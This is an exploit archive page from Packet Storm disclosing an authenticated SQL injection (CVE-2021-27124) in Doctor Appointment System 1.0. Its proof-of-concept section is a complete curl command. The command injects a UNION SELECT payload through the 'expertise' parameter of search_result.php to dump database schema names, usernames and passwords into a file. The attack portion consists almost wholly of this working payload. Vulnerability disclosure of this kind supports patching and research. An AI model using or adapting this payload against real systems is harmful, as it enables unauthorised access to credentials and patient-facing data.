what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Doctor Appointment System 1.0 SQL Injection

Doctor Appointment System 1.0 SQL Injection
Posted Feb 9, 2021
Authored by Nakul Ratti, Soham Bakore

Doctor Appointment System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2021-27124
SHA-256 | 2be466f5c972b7bc52fba325e294081ccedb219ec55bfbddd18133121c49d6e3

Doctor Appointment System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection
# Date: 2021-02-09
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0


Vulnerable File:
----------------
http://host/patient/search_result.php

Vulnerable Issue:
-----------------
Expertise parameter has no input validation

POC:
----
1] Login as a normal patient user
2] Insert cookie after successful login in the below command:
curl -i -s -o tmp -k -X $'POST' \
-H $'Host: 192.168.1.12' -H $'Content-Type:
application/x-www-form-urlencoded' -H $'Content-Length: 288' -H
$'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H
$'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
--data-binary
$'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'<br>\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&submit='
\
$'http://host/patient/search_result.php'
3] Check the tmp file for sensitive information from the database.
------------------


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close